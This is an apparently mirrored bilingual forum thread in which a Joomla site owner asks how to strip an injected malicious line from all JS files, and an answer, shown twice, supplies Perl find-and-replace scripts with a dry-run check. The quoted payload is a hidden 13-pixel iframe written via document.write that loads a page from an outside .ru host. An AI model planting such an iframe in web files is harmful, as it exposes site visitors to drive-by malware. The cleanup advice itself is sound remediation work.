The following malicious line was injected at the end of all js files on all my Joomla installations on my shared host account:
在我的共享主机帐户上的所有Joomla安装的所有js文件的末尾注入了以下恶意行:
;document.write('<iframe src="http://tweakdoled.ru/confirmingunhelpful.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>');
I want to remove it at once from all files using the following SSH command (which should have some errors):
我想使用以下SSH命令(应该有一些错误)从所有文件中立即删除它:
find ./ -name "*.js" -type f | xargs perl -pi -e 's/;document.write\(\'\<iframe src\=\"http\:\/\/tweakdoled.ru\".*\"\);//g'
The problem is since a backslash has to be used to escape some characters, I don't know if I'm using it correctly and what else should be escaped.
问题是因为必须使用反斜杠来转义某些字符,我不知道我是否正确使用它以及还有什么应该被转义。
Needless to say, that command is not working.
不用说,该命令不起作用。
Any ideas?
Thanks!!
1 个解决方案
#1
1
Use the Perl \Q...\E notation to suspend the metacharacters. However, since there's such a mess of characters in the string to be matched that are also special to the shell, I'd place the Perl regex into a file (script.pl), using % (which doesn't appear in the string to be replaced) as the regex delimiter:
使用Perl \ Q ... \ E表示法暂停元字符。但是,由于要匹配的字符串中存在如此混乱的字符,这对于shell也是特殊的,我将Perl正则表达式放入文件(script.pl)中,使用%(不会出现在字符串中)要替换)作为正则表达式分隔符:
s%\Q;document.write('<iframe src="http://tweakdoled.ru/confirmingunhelpful.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>');\E%%g;
And then run it with:
然后运行它:
find ./ -name "*.js" -type f | xargs perl -pi.bak -f script.pl
If you spend enough time, you probably can find a way to make it work without the script file; it probably isn't worth the effort, though (especially since I'm sure you asked something very similar to this several days ago).
如果你花了足够的时间,你可能会找到一种方法让它在没有脚本文件的情况下工作;尽管如此,这可能是不值得的(特别是因为我确定你几天前问了一些非常相似的东西)。
Obviously, before running this to edit the files, you'll run a variant to ensure that the sought after lines are printed:
显然,在运行此编辑文件之前,您将运行一个变体以确保打印所需的行:
script2.pl:
print if m%\Q;document.write('<iframe src="http://tweakdoled.ru/confirmingunhelpful.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>');\E%;
run using:
find ./ -name "*.js" -type f | xargs perl -n -f script2.pl
If this doesn't detect the lines, then you track down a variation until you can find something that does match. You might decide to use something like:
如果这没有检测到线条,那么您将跟踪变体,直到找到匹配的内容。您可能决定使用以下内容:
print if m%;document.write.'<iframe src="http://tweakdoled.ru/confirmingunhelpful.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>'.;%;
This replaces the two parentheses with . (so, in theory, it might match something else, but in practice, it won't).
这将用两个括号替换。 (所以,理论上,它可能与其他东西匹配,但在实践中,它不会)。
#1
1
Use the Perl \Q...\E notation to suspend the metacharacters. However, since there's such a mess of characters in the string to be matched that are also special to the shell, I'd place the Perl regex into a file (script.pl), using % (which doesn't appear in the string to be replaced) as the regex delimiter:
使用Perl \ Q ... \ E表示法暂停元字符。但是,由于要匹配的字符串中存在如此混乱的字符,这对于shell也是特殊的,我将Perl正则表达式放入文件(script.pl)中,使用%(不会出现在字符串中)要替换)作为正则表达式分隔符:
s%\Q;document.write('<iframe src="http://tweakdoled.ru/confirmingunhelpful.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>');\E%%g;
And then run it with:
然后运行它:
find ./ -name "*.js" -type f | xargs perl -pi.bak -f script.pl
If you spend enough time, you probably can find a way to make it work without the script file; it probably isn't worth the effort, though (especially since I'm sure you asked something very similar to this several days ago).
如果你花了足够的时间,你可能会找到一种方法让它在没有脚本文件的情况下工作;尽管如此,这可能是不值得的(特别是因为我确定你几天前问了一些非常相似的东西)。
Obviously, before running this to edit the files, you'll run a variant to ensure that the sought after lines are printed:
显然,在运行此编辑文件之前,您将运行一个变体以确保打印所需的行:
script2.pl:
print if m%\Q;document.write('<iframe src="http://tweakdoled.ru/confirmingunhelpful.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>');\E%;
run using:
find ./ -name "*.js" -type f | xargs perl -n -f script2.pl
If this doesn't detect the lines, then you track down a variation until you can find something that does match. You might decide to use something like:
如果这没有检测到线条,那么您将跟踪变体,直到找到匹配的内容。您可能决定使用以下内容:
print if m%;document.write.'<iframe src="http://tweakdoled.ru/confirmingunhelpful.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>'.;%;
This replaces the two parentheses with . (so, in theory, it might match something else, but in practice, it won't).
这将用两个括号替换。 (所以,理论上,它可能与其他东西匹配,但在实践中,它不会)。